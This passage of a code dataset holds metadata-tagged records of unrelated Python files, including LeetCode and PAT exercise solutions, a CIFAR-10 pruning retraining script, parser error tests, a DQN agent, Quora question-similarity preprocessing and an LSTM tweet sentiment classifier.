set()\n while n != 1 :\n t.add(n)\n if n % 2 == 0:\n n /= 2\n else:\n n = (n*3+1)/2\n return t\n\ninput()\nl = list(map(int,set(input().split())))\n\nts = set()\ntl = []\n\nfor i in l:\n ss = callatz(i)\n if ts.issubset(ss):\n ts = ss\n tl = [i]\n elif ts.issuperset(ss):\n continue\n else:\n for j in tl:\n if callatz(j).issubset(ss):\n tl.remove(j)\n ts |= ss\n tl.append(i)\n\ntl = sorted(tl, reverse=True)\nprint(' '.join(str(x) for x in tl))","repo_name":"liuchuo/PAT","sub_path":"BasicLevel_Python/1005 继续(3n+1)猜想 (25 分).py","file_name":"1005 继续(3n+1)猜想 (25 分).py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":3185,"dataset":"github-code","pt":"67"} +{"seq_id":"39270233069","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def pathSum(self, root: Optional[TreeNode], targetSum: int) -> List[List[int]]:\n self.output = []\n \n def dfs(node,path,curSum):\n if not root:\n return []\n curSum += node.val\n temp = path + [node.val]\n if node.left:\n dfs(node.left,temp,curSum)\n if node.right:\n dfs(node.right,temp,curSum)\n if not node.left and not node.right and curSum == targetSum:\n self.output.append(temp)\n dfs(root,[],0)\n return self.output\n \n \n # output = [] \n # def dfs(root,curSum,pathList):\n # if not root:\n # return \n # curSum += root.val\n # pathList.append(root.val)\n # print(pathList)\n # if not root.left and not root.right:\n # if targetSum == curSum:\n # output.append(pathList)\n # if root.left:\n # dfs(root.left,curSum,pathList)\n # if root.right:\n # dfs(root.right,curSum,pathList)\n # # self.pathList.pop()\n # dfs(root,0,[])\n # return output\n\n ","repo_name":"chizzyedoka/LeetCode_solutions","sub_path":"0113-path-sum-ii/0113-path-sum-ii.py","file_name":"0113-path-sum-ii.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"12010706361","text":"import os\r\nimport torchvision.datasets as dsets\r\nimport torchvision.transforms as transforms\r\nfrom torch.optim.lr_scheduler import CosineAnnealingLR\r\nfrom gcp import *\r\nfrom tqdm import tqdm\r\nfrom model import *\r\nimport argparse\r\ndef warn(*args, **kwargs):\r\n pass\r\nimport warnings\r\nwarnings.warn = warn\r\n\r\nparser = argparse.ArgumentParser(description='CIFAR-10 Retraining')\r\nparser.add_argument('--save_dir', type=str, default='./cifarmodel/', help='Folder to save checkpoints and log.')\r\nparser.add_argument('-a', '--arch', default='resnet', type=str, metavar='N', help='network architecture (default: resnet)')\r\nparser.add_argument('-l', '--layers', default=-1, type=int, metavar='N', help='number of ResNet layers (default: 20)')\r\nparser.add_argument('-d', '--device', default='0', type=str, metavar='N', help='main device (default: 0)')\r\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N', help='number of data loading workers (default: 4)')\r\nparser.add_argument('--epochs', default=164, type=int, metavar='N', help='number of total epochs to run')\r\nparser.add_argument('-b', '--batch-size', default=128, type=int, metavar='N', help='mini-batch size (default: 256)')\r\nparser.add_argument('--lr', '--learning-rate', default=0.05, type=float, metavar='LR', help='initial learning rate')\r\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M', help='momentum')\r\nparser.add_argument('--weight-decay', '--wd', default=1e-3, type=float, metavar='W', help='weight decay (default: 1e-4)')\r\nparser.add_argument('-c', '--comp', default=0.25, type=float, metavar='N', help='remaining channels (%)')\r\nparser.add_argument('-g', '--groups', default=8, type=int, metavar='N', help='number of groups (default: 4)')\r\nparser.add_argument('-r', '--reg', type=float, metavar='R', help='Group lasso hyperparameter (default: auto)')\r\n\r\nargs = parser.parse_args()\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.device\r\n\r\ndef warmup(optimizer, lr, epoch):\r\n if epoch < 2:\r\n lr = lr/4\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] = lr\r\n\r\n if epoch == 2:\r\n lr = lr\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] = lr\r\n\r\ndef get_lr(optimizer):\r\n return [param_group['lr'] for param_group in optimizer.param_groups]\r\n\r\ndevice = torch.device(\"cuda\")\r\n\r\ndef train(filename, network):\r\n reg = args.reg\r\n \r\n\r\n train_dataset = dsets.CIFAR10(root='./dataset',\r\n train=True,\r\n download=True,\r\n transform=transforms.Compose([\r\n transforms.RandomHorizontalFlip(),\r\n transforms.RandomCrop(32, 4),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.4914, 0.4822, 0.4465),\r\n std=(0.2470, 0.2435, 0.2616))\r\n ]))\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\r\n batch_size=args.batch_size, num_workers=args.workers,\r\n shuffle=True, drop_last=True)\r\n test_dataset = dsets.CIFAR10(root='./dataset',\r\n train=False,\r\n transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.4914, 0.4822, 0.4465),\r\n std=(0.2470, 0.2435, 0.2616))\r\n ]))\r\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,\r\n batch_size=args.batch_size, num_workers=args.workers,\r\n shuffle=False)\r\n\r\n torch.backends.cudnn.benchmark=True\r\n cnn, netname = network(args.layers)\r\n config = netname\r\n if 'resnet' in filename:\r\n loadpath = args.save_dir+'/resnet%d_%s.pkl'%(args.layers, args.device)\r\n elif 'wrn' in filename:\r\n loadpath = args.save_dir+'/wrn%d_%s.pkl'%(args.layers, args.device)\r\n print(loadpath)\r\n cnn.load_state_dict(torch.load(loadpath)[0])\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n bestacc=0\r\n \r\n if 'resnet' in filename:\r\n optimizer = torch.optim.SGD(cnn.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\r\n elif 'wrn' in filename:\r\n optimizer = torch.optim.SGD(cnn.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay, nesterov=True)\r\n\r\n scheduler = CosineAnnealingLR(optimizer, args.epochs)\r\n pruner = GCP(cnn, args.comp, 0, args.groups)\r\n pruner.initialize(False)\r\n bar = tqdm(total=len(train_loader) * args.epochs)\r\n for epoch in range(args.epochs):\r\n cnn.train()\r\n for step, (images, labels) in enumerate(train_loader):\r\n optimizer.zero_grad()\r\n gpuimg = images.to(device)\r\n labels = labels.to(device)\r\n\r\n outputs = cnn(gpuimg)\r\n loss = criterion(outputs, labels) + prune_reg(cnn, reg)\r\n loss.backward()\r\n optimizer.step()\r\n bar.set_description(\"[\" + config + \"]LR:%.4f|LOSS:%.2f|ACC:%.2f\" % (get_lr(optimizer)[0], loss.item(), bestacc))\r\n bar.update()\r\n\r\n scheduler.step()\r\n\r\n cnn.eval()\r\n correct = 0\r\n total = 0\r\n with torch.no_grad():\r\n for images, labels in test_loader:\r\n images = images.to(device)\r\n outputs = cnn(images)\r\n _, predicted = torch.max(outputs.data, 1)\r\n total += labels.size(0)\r\n correct += (predicted.cpu() == labels).sum().item()\r\n acc = 100 * correct / total\r\n cnn.train()\r\n\r\n if bestacc> (lambda a, b, c: a + b + c)\n p2 = fro.rgx(r\"abQ\", name=\"p2\")\n parser = fro.alt([p1, p2], name=\"parent\")\n self.assertParseErrorAttributes(\n parser, \"ab0\",\n column=2,\n line=0,\n name=\"p1\")\n\n def test_comp1(self):\n p1 = fro.seq(fro.intp, sep=r\",\").name(\"p1\")\n parser = fro.comp([r\"~\\[\", p1, r\"~\\]\"], name=\"comp\").get() | sum\n length = random.randint(0, 5)\n s = \"[{}]\".format(\",\".join(str(n) for n in range(length)))\n for i in range(len(s)):\n char = s[i]\n names = []\n if char in '[]':\n names.append(\"comp\")\n elif char in ',':\n names.append(\"p1\")\n names.append(\"comp\")\n else:\n names.append(\"int\")\n modified_s = s[:i] + \"$\" + s[i+1:]\n self.assertParseErrorAttributes(\n parser,\n modified_s,\n message=\"i={0}, s={1}\".format(i, modified_s),\n column=i,\n line=0,\n names=names)\n\n def test_nested1(self):\n parser = fro.nested(r\"\\(\", r\"\\)\")\n s = \"((hey there)(goodbye)\"\n self.assertParseErrorAttributes(\n parser,\n s,\n column=0,\n line=0)\n\n def test_seq1(self):\n floatsp = fro.seq(fro.floatp, sep=r\"~,\")\n for _ in range(10):\n length = random.randint(2, 8)\n s = \",\".join(str(utils.random_float()) for _ in range(length))\n s = s.replace(\",\", \">\", 1)\n self.assertParseErrorAttributes(\n floatsp,\n s,\n message=\"s={0}\".format(s),\n line=0)\n\n def test_tie1(self):\n def _func(parser):\n return fro.comp([r\"a\", parser.maybe(0).name(\"maybe\")]) >> (lambda _, y: y + 1)\n parser = fro.tie(_func, name=\"knot\")\n for i in range(0, 10):\n s = \"a\" * i + \"b\"\n self.assertParseErrorAttributes(\n parser,\n s,\n message=\"s={0}\".format(s),\n line=0,\n column=i,\n names=[\"knot\"])\n\n\n\n def assertParseErrorAttributes(self, parser, string, message=None, **kwargs):\n \"\"\"\n Asserts that parser.parse(s) raises a FroParseError, and asserts\n specified properties of the raised error\n \"\"\"\n try:\n parser.parse_str(string)\n self.fail(\"No error was thrown\")\n except fro.FroParseError as e:\n names = [m.name() for m in e.messages()]\n if \"column\" in kwargs:\n self.assertEqual(kwargs[\"column\"], e.column(index_from=0), message)\n if \"line\" in kwargs:\n self.assertEqual(kwargs[\"line\"], e.line(index_from=0), message)\n if \"name\" in kwargs:\n self.assertIn(kwargs[\"name\"], names, message)\n if \"names\" in kwargs:\n for name in kwargs[\"names\"]:\n self.assertIn(name, names, message)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ethantkoenig/fro","sub_path":"tests/test_errors.py","file_name":"test_errors.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70694366615","text":"import RL\nfrom RL.models.dqn_model import Brain\nimport numpy as np\n\n\nclass DQNActAgent(RL.Agent):\n def __init__(self, context: RL.Context, name, head_names=[\"default\"]):\n super().__init__(context, name)\n self.head_names = head_names\n self.model = Brain(self.context, '{0}/main_brain'.format(self.name), False, head_names=self.head_names)\n\n def epsilon_greedy_policy(self, model: Brain, states, epsilon):\n if not hasattr(self, \"_exp_pol_called\") and len(self.head_names) > 1:\n RL.logger.log(\"There are multiple Q heads in agent {0}. Exploit policy will choose greedy action using first head only\".format(self.name))\n self._exp_pol_called = True\n greedy_actions, = model.get_argmax_Q(states, head_names=[self.head_names[0]])\n r = np.random.random(size=[len(states)])\n greedy_mask = (r > epsilon).astype(np.int)\n random_actions = np.random.randint(0, self.context.env.action_space.n, size=[len(states)])\n actions = (1 - greedy_mask) * random_actions + greedy_mask * greedy_actions\n return actions\n\n def exploit_policy(self, model: Brain, states):\n return self.epsilon_greedy_policy(model, states, self.context.exploit_epsilon)\n\n def policy(self, model: Brain, states, exploit_modes):\n assert len(exploit_modes) == len(states)\n epsilon = [self.context.exploit_epsilon if m else self.context.epsilon for m in exploit_modes]\n return self.epsilon_greedy_policy(model, states, np.asarray(epsilon))\n\n def acts(self):\n if not self.context.eval_mode and self.runner.num_steps < self.context.minimum_experience:\n return None # let the random player act\n else:\n return self.policy(self.model, self.runner.obss, self.context.force_exploits)\n","repo_name":"bhatiaabhinav/RL","sub_path":"RL/agents/dqn_act_agent.py","file_name":"dqn_act_agent.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25197374327","text":"import os\n\nfrom optparse import OptionParser\n\nRANDOM_SEARCH = \"random-search\"\nMODEL_EVALUATION = \"model-eval\"\n\n\nclass CLI(object):\n\n def __init__(self):\n parser = OptionParser()\n parser.add_option(\"--submit\", action=\"store_true\", help=\"Create submission files.\")\n parser.add_option(\"--sample\", action=\"store_true\", help=\"Use sample train dataset.\")\n parser.add_option(\"--logging\", action=\"store_true\", help=\"Log execution.\")\n parser.add_option(\"--model\", type=\"string\", help=\"ML Model\")\n parser.add_option(\"--iter\", type=\"string\", help=\"Number of iterations (config option must not be provided.\")\n parser.add_option(\"--config\", type=\"string\", help=\"Configuration file for model (iter option must not be provided).\")\n self.opts, _ = parser.parse_args(args=None, values=None)\n self.check_options()\n\n def check_options(self):\n model_opt = getattr(self.opts, \"model\")\n iter_opt = getattr(self.opts, \"iter\")\n config_opt = getattr(self.opts, \"config\")\n valid_models = [\"xgboost\", \"random-forest\"]\n\n if model_opt is None:\n raise ValueError(\"A model must be provided.\")\n\n if model_opt not in valid_models:\n raise ValueError(\"Invalid model: %s not in %s\" % (model_opt, str(valid_models)))\n\n if iter_opt:\n int(iter_opt)\n\n if config_opt:\n if not os.path.exists(config_opt):\n raise ValueError(\"File %s does not exists.\" % config_opt)\n\n if sum([isinstance(e, str) for e in [iter_opt, config_opt]]) != 1:\n raise ValueError(\"Exactly one flag must be used: either --iter or --config\")\n\n def determine_action(self):\n config_opt = getattr(self.opts, \"config\")\n if not config_opt:\n return RANDOM_SEARCH, getattr(self.opts, \"iter\")\n return MODEL_EVALUATION, config_opt\n\n def get(self, key):\n return getattr(self.opts, key)\n","repo_name":"RHDZMOTA/TalkingDataChallenge","sub_path":"util/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37615928659","text":"import os\nimport re\nimport pandas as pd \nimport numpy as np \nimport distance\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom nltk.corpus import stopwords\nfrom bs4 import BeautifulSoup\nfrom fuzzywuzzy import fuzz\nimport config\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nnltk.download('stopwords')\n\n\nclass DataPreprocess:\n\n def __init__(self, data, SAFE_DIV = 0.0001):\n self.data = data\n self.SAFE_DIV = SAFE_DIV \n self.STOP_WORDS = stopwords.words('english')\n \n @staticmethod\n def question_preprocess(x):\n x = str(x).lower()\n x = x.replace(\",000,000\", \"m\").replace(\",000\", \"k\").replace(\"′\", \"'\").replace(\"’\", \"'\")\\\n .replace(\"won't\", \"will not\").replace(\"cannot\", \"can not\").replace(\"can't\", \"can not\")\\\n .replace(\"n't\", \" not\").replace(\"what's\", \"what is\").replace(\"it's\", \"it is\")\\\n .replace(\"'ve\", \" have\").replace(\"i'm\", \"i am\").replace(\"'re\", \" are\")\\\n .replace(\"he's\", \"he is\").replace(\"she's\", \"she is\").replace(\"'s\", \" own\")\\\n .replace(\"%\", \" percent \").replace(\"₹\", \" rupee \").replace(\"$\", \" dollar \")\\\n .replace(\"€\", \" euro \").replace(\"'ll\", \" will\").replace(\"し\",\"\").replace(\"シ\",\"\")\n\n x = re.sub(r\"([0-9]+)000000\", r\"\\1m\", x)\n x = re.sub(r\"([0-9]+)000\", r\"\\1k\", x)\n porter = PorterStemmer()\n pattern = re.compile('\\W')\n\n if type(x) == type(''):\n x =re.sub(pattern, ' ', x)\n\n if type(x) == type(' '):\n x = porter.stem(x)\n example = BeautifulSoup(x, \"html.parser\")\n x = example.get_text()\n\n return x\n \n # @staticmethod\n def get_token_features(self, q1, q2):\n token_features = [0.0]*10\n \n # Converting the Sentence into Tokens: \n q1_tokens = q1.split()\n q2_tokens = q2.split()\n\n if len(q1_tokens) == 0 or len(q2_tokens) == 0:\n return token_features\n # Get the non-stopwords in Questions\n q1_words = set([word for word in q1_tokens if word not in self.STOP_WORDS])\n q2_words = set([word for word in q2_tokens if word not in self.STOP_WORDS])\n \n #Get the stopwords in Questions\n q1_stops = set([word for word in q1_tokens if word in self.STOP_WORDS])\n q2_stops = set([word for word in q2_tokens if word in self.STOP_WORDS])\n \n # Get the common non-stopwords from Question pair\n common_word_count = len(q1_words.intersection(q2_words))\n \n # Get the common stopwords from Question pair\n common_stop_count = len(q1_stops.intersection(q2_stops))\n \n # Get the common Tokens from Question pair\n common_token_count = len(set(q1_tokens).intersection(set(q2_tokens)))\n \n \n token_features[0] = common_word_count / (min(len(q1_words), len(q2_words)) + self.SAFE_DIV)\n token_features[1] = common_word_count / (max(len(q1_words), len(q2_words)) + self.SAFE_DIV)\n token_features[2] = common_stop_count / (min(len(q1_stops), len(q2_stops)) + self.SAFE_DIV)\n token_features[3] = common_stop_count / (max(len(q1_stops), len(q2_stops)) + self.SAFE_DIV)\n token_features[4] = common_token_count / (min(len(q1_tokens), len(q2_tokens)) + self.SAFE_DIV)\n token_features[5] = common_token_count / (max(len(q1_tokens), len(q2_tokens)) + self.SAFE_DIV)\n \n # Last word of both question is same or not\n token_features[6] = int(q1_tokens[-1] == q2_tokens[-1])\n \n # First word of both question is same or not\n token_features[7] = int(q1_tokens[0] == q2_tokens[0])\n \n token_features[8] = abs(len(q1_tokens) - len(q2_tokens))\n \n #Average Token Length of both Questions\n token_features[9] = (len(q1_tokens) + len(q2_tokens))/2\n return token_features\n \n @staticmethod\n def normalized_word_Common(row):\n w1 = set(map(lambda word: word.lower().strip(), row['question1'].split(\" \")))\n w2 = set(map(lambda word: word.lower().strip(), row['question2'].split(\" \"))) \n return 1.0 * len(w1 & w2)\n\n @staticmethod\n def normalized_word_share(row):\n w1 = set(map(lambda word: word.lower().strip(), row['question1'].split(\" \")))\n w2 = set(map(lambda word: word.lower().strip(), row['question2'].split(\" \"))) \n return 1.0 * len(w1 & w2)/(len(w1) + len(w2))\n\n @staticmethod\n def get_longest_substr_ratio(a, b):\n strs = list(distance.lcsubstrings(a, b))\n if len(strs) == 0:\n return 0\n else:\n return len(strs[0]) / (min(len(a), len(b)) + 1)\n\n def create_new_features(self):\n # normal custom features\n\n self.data[\"question1\"] = self.data[\"question1\"].fillna(\"\").apply(self.question_preprocess)\n self.data[\"question2\"] = self.data[\"question2\"].fillna(\"\").apply(self.question_preprocess)\n\n self.data['freq_qid1'] = self.data.groupby(['qid1'])['qid1'].transform('count') \n self.data['freq_qid2'] = self.data.groupby('qid2')['qid2'].transform('count')\n\n self.data['q1len'] = self.data['question1'].str.len()\n self.data['q2len'] = self.data['question1'].str.len()\n\n self.data['q1_n_words'] = self.data['question1'].apply(lambda row: len(row.split(\" \")))\n self.data['q2_n_words'] = self.data['question2'].apply(lambda row: len(row.split(\" \")))\n\n self.data['word_Common'] = self.data.apply(self.normalized_word_Common, axis=1)\n self.data['word_share'] = self.data.apply(self.normalized_word_share, axis=1)\n\n self.data['word_Total'] = self.data['q1_n_words'] + self.data['q2_n_words']\n\n self.data['freq_q1+q2'] = self.data['freq_qid1'] + self.data['freq_qid2']\n self.data['freq_q1-q2'] = abs(self.data['freq_qid1'] - self.data['freq_qid2'])\n\n # advanced features\n self.token_features = self.data.apply(lambda x: self.get_token_features(x[\"question1\"], x[\"question2\"]), axis=1)\n\n self.data[\"cwc_min\"] = list(map(lambda x: x[0], self.token_features))\n self.data[\"cwc_max\"] = list(map(lambda x: x[1], self.token_features))\n self.data[\"csc_min\"] = list(map(lambda x: x[2], self.token_features))\n self.data[\"csc_max\"] = list(map(lambda x: x[3], self.token_features))\n self.data[\"ctc_min\"] = list(map(lambda x: x[4], self.token_features))\n self.data[\"ctc_max\"] = list(map(lambda x: x[5], self.token_features))\n self.data[\"last_word_eq\"] = list(map(lambda x: x[6], self.token_features))\n self.data[\"first_word_eq\"] = list(map(lambda x: x[7], self.token_features))\n self.data[\"abs_len_diff\"] = list(map(lambda x: x[8], self.token_features))\n self.data[\"mean_len\"] = list(map(lambda x: x[9], self.token_features))\n\n self.data[\"token_set_ratio\"] = self.data.apply(lambda x: fuzz.token_set_ratio(x[\"question1\"], x[\"question2\"]), axis=1)\n self.data[\"token_sort_ratio\"] = self.data.apply(lambda x: fuzz.token_sort_ratio(x[\"question1\"], x[\"question2\"]), axis=1)\n self.data[\"fuzz_ratio\"] = self.data.apply(lambda x: fuzz.QRatio(x[\"question1\"], x[\"question2\"]), axis=1)\n self.data[\"fuzz_partial_ratio\"] = self.data.apply(lambda x: fuzz.partial_ratio(x[\"question1\"], x[\"question2\"]), axis=1)\n\n self.data[\"longest_substr_ratio\"] = self.data.apply(lambda x: self.get_longest_substr_ratio(x[\"question1\"], x[\"question2\"]), axis=1)\n\n return self.data\n\n","repo_name":"IMsumitkumar/Quora-question-pair-similarity-end-to-end","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"2904053058","text":"import pandas as pd\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\n\nfrom collections import Counter\n\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.models import Sequential\nfrom keras.callbacks import ModelCheckpoint\nfrom keras import layers, regularizers\nfrom keras.layers import Embedding, LSTM, Dense, SpatialDropout1D, Dropout\n\nnltk.download('stopwords')\nnltk.download('wordnet')\nnltk.download('punkt')\n\nlemmatizer = WordNetLemmatizer()\nstop = stopwords.words('english')\nstop.extend(['@', '.', '#', 'user'])\n\n# Loading Data and Sanity Checks\ntrain_data_add = \"./Data/dataset.csv\"\ntrain_data = pd.read_csv(train_data_add)\n\n## Checking Data\nprint(\"Training Data\")\nprint(train_data.head(3))\nprint(\"Length of Test data = \", len(train_data))\ntrain_data.head(5)\n\n# Pre-Procesing\n\"\"\"\nPre-processing of data\n 0) Making Every tweet to lowercase\n 1) Tokenization\n 2) Stop Word \n 3) Lemmatization\n\"\"\"\n\n## Converting to Lower Case\ncount = 0\nfor i in range(len(train_data)):\n try:\n train_data.iloc[i, 0] = train_data.iloc[i, 0].lower()\n except:\n train_data.iloc[i, 0] = str(train_data.iloc[i, 0]).lower()\n pass\nprint(\"Training Data : \", train_data.iloc[0, 0])\n\n## Tokenization\ntokens = []\nfor i in range(len(train_data)):\n tokens.append(nltk.word_tokenize(train_data.iloc[i, 0]))\nprint(\"After Tokenizing : \", tokens[0])\n\n## Stop Word Removal\nfiltered_tokens = []\nfor i in range(len(tokens)):\n filtered_tokens.append([word for word in tokens[i] if word not in stop])\nprint(\"After Removing Stop Words : \", filtered_tokens[0])\n\n## Lemmatization\nlemmatizers = []\nfor i in range(len(filtered_tokens)):\n lemmatizers.append([lemmatizer.lemmatize(word) for word in filtered_tokens[i]])\nprint(\"After Lemmatization : \", lemmatizers[0])\n\ntotal_words = []\nfor i in range(len(lemmatizers)):\n total_words.extend(lemmatizers[i])\n\n## Extra Tokenizer\n\ntokenizer = Tokenizer(\n num_words=len(total_words),\n filters= '\"#$%&()*+-/:,;<=>@[\\]^_`{|}~'\n)\ntokenizer.fit_on_texts(lemmatizers)\n\n# Pictorial Analysis of Word Lengths\n\n\"\"\"\n The next step currently is converting these words into numbers based on occurances and padding with zeros for length \n\"\"\"\nword_lengths = []\nfor i in range(len(lemmatizers)):\n word_lengths.append(len(lemmatizers[i]))\nmean = sum(word_lengths) / len(word_lengths)\n# plt.hist(word_lengths)\n# plt.show()\n# Over here The max_length represents the max length of phrase taken inro consideration\nmax_len = round(mean)\nprint(\"Mean Length of tweets : \", max_len)\n\n# One Hot Encoding of the Data\npos = []\nmid = []\nneg = []\nfor l in range(len(train_data.iloc[:, 1])):\n if train_data.iloc[l, 1] == 0:\n pos.append(0)\n mid.append(0)\n neg.append(1)\n elif train_data.iloc[l, 1] == 1:\n pos.append(0)\n mid.append(1)\n neg.append(0)\n else:\n pos.append(1)\n mid.append(0)\n neg.append(0)\ntrain_data['Pos'] = pos\ntrain_data['Mid'] = mid\ntrain_data[\"Neg\"] = neg\nprint(\"\\n Training Data\")\nprint(train_data.head(2))\n\n# Finding Highest frequency of words and creating the int dict\nlemmatizers_to_int = Counter(total_words)\ntotal_word_count = len(total_words)\nprint(\"\\n\\nTotal Word Count : \", total_word_count)\n\nsorted_order = lemmatizers_to_int.most_common(total_word_count)\nprint(\"Top 5 repeated Words : \", [word for (word,key) in sorted_order[0:5]])\n\nvocab_to_index = {w: i + 1 for i, (w, c) in enumerate(sorted_order)}\n\n## Encoding to numbers\nnum_encoded_reviews = []\nfor i in range(len(lemmatizers)):\n num_encoded_reviews.append([vocab_to_index[word] for word in lemmatizers[i]])\nprint(\"Num Encoded First Tweet : \", num_encoded_reviews[0])\n\n## Padding and truncating\npadded_reviews = pad_sequences(num_encoded_reviews, maxlen=max_len)\nprint(\"Padded First Tweet : \",padded_reviews[0])\n\n# Modelling and Training\n## X_train and Y_train\nX_train = np.array(padded_reviews[0:int(len(padded_reviews) * 0.8)])\nY_train = train_data.loc[0:int(len(padded_reviews) * 0.8), [\"Pos\", \"Mid\", \"Neg\"]]\n\n## X_test and Y_test\nX_test = np.array(padded_reviews[int(len(padded_reviews) * 0.8):])\nY_test = train_data.loc[int(len(padded_reviews) * 0.8):len(padded_reviews), [\"Pos\", \"Mid\", \"Neg\"]]\n\ncheckpoint1_Model1 = ModelCheckpoint(\".ipynb_checkpoints/best_mode1_15-02-2021.hdf5\", monitor='accuracy', save_best_only=True,\n save_weights_only=False)\ncheckpoint1_Model2 = ModelCheckpoint(\".ipynb_checkpoints/best_mode2_15-02-2021.hdf5\", monitor='accuracy', save_best_only=True,\n save_weights_only=False)\n\n## Model 1\n# Now we are ready to train our model through LSTM network\nmodel = Sequential()\nmodel.add(layers.Embedding(len(vocab_to_index) + 1, output_dim=45, input_length=max_len))\nmodel.add(SpatialDropout1D(0.3))\nmodel.add(layers.LSTM(45))\nmodel.add(layers.Dense(10, activation='relu', input_shape=(45,)))\nmodel.add(layers.Dense(3, activation='softmax', input_shape=(10,)))\n\nmodel.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nprint(\"Model 1 : \")\nprint(model.summary())\n\n# Our vectorized labels\nmodel.fit(X_train, Y_train, validation_split=0.2, epochs=16, callbacks=[checkpoint1_Model1], verbose=1)\n\n## Model 2\nmodel_lstm = Sequential()\nmodel_lstm.add(Embedding(input_dim=len(vocab_to_index) + 1, output_dim=256, input_length=max_len))\nmodel_lstm.add(SpatialDropout1D(0.3))\nmodel_lstm.add(LSTM(256, dropout=0.3, recurrent_dropout=0.3))\nmodel_lstm.add(Dense(256, activation='relu'))\nmodel_lstm.add(Dropout(0.3))\nmodel_lstm.add(Dense(3, activation='softmax'))\nmodel_lstm.compile(\n loss='categorical_crossentropy',\n optimizer='Adam',\n metrics=['accuracy']\n)\nprint(\"Model 2 : \")\nprint(model_lstm.summary())\n\nhistory = model_lstm.fit(\n X_train,\n Y_train,\n validation_split=0.1,\n epochs=16,\n batch_size=512,\n callbacks=[checkpoint1_Model2]\n)\n\n# Evaluation\n## Model 1\n# Evaluate the model on the test data using `evaluate`\nprint(\"Evaluate on test data\")\nresults = model.evaluate(X_test, Y_test, batch_size=128)\nprint(\"test loss, test acc:\", results)\n\n# Generate predictions (probabilities -- the output of the last layer)\n# on new data using `predict`\nprint(\"Generate predictions for 3 samples\")\npredictions = model.predict(X_test[:1])\nprint(\"predictions shape:\", predictions.shape)\n\nprint(np.around(predictions, 2), np.array(Y_test[:1]))\n\n# Evaluate the model on the test data using `evaluate`\nprint(\"Evaluate on test data\")\nresults = model_lstm.evaluate(X_test, Y_test, batch_size=128)\nprint(\"test loss, test acc:\", results)\n\n# Generate predictions (probabilities -- the output of the last layer)\n# on new data using `predict`\nprint(\"Generate predictions for 3 samples\")\npredictions = model_lstm.predict(X_test[:5])\nprint(\"predictions shape:\", predictions.shape)\n\nprint(np.around(predictions, 2), np.array(Y_test[:5]))\n","repo_name":"unKNOWN-G/Projects","sub_path":"Sentimental_Analysis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7081,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"5206219619","text":"'''\r\nAuthor: ZHAO Zinan\r\nCreated: 12/01/2018\r\n\r\n167. Two Sum II - Input array is sorted\r\nhttps://leetcode.com/problems/two-sum-ii-input-array-is-sorted/description/\r\n'''\r\nclass Solution(object):\r\n def twoSum(self, numbers, target):\r\n \"\"\"\r\n :type numbers: List[int]\r\n :type target: int\r\n :rtype: List[int]\r\n \"\"\"\r\n i = 0\r\n j = len(numbers)-1\r\n\r\n while i < j:\r\n sumtwo = numbers[i] + numbers[j]\r\n if sumtwo == target:\r\n return [i+1, j+1]\r\n elif sumtwo < target:\r\n i += 1\r\n else:\r\n j -= 1\r\n \r\n ","repo_name":"zi-NaN/algorithm_exercise","sub_path":"leetcode/167.py","file_name":"167.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32093186574","text":"import torch\nimport numpy as np\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport time\nimport numpy as np\nVERY_SMALL_NUMBER = 1e-10\nVERY_NEG_NUMBER = -100000000000\n\n\nclass BaseInstruction(torch.nn.Module):\n\n def __init__(self, args):\n super(BaseInstruction, self).__init__()\n self._parse_args(args)\n self.share_module_def()\n\n def _parse_args(self, args):\n self.device = torch.device('cuda' if args['use_cuda'] else 'cpu')\n # self.share_encoder = args['share_encoder']\n self.q_type = args['q_type']\n self.num_step = args['num_step']\n self.lstm_dropout = args['lstm_dropout']\n self.linear_dropout = args['linear_dropout']\n\n for k, v in args.items():\n if k.endswith('dim'):\n setattr(self, k, v)\n if k.endswith('emb_file') or k.endswith('kge_file'):\n if v is None:\n setattr(self, k, None)\n else:\n setattr(self, k, args['data_folder'] + v)\n\n self.reset_time = 0\n\n def share_module_def(self):\n # dropout\n self.lstm_drop = 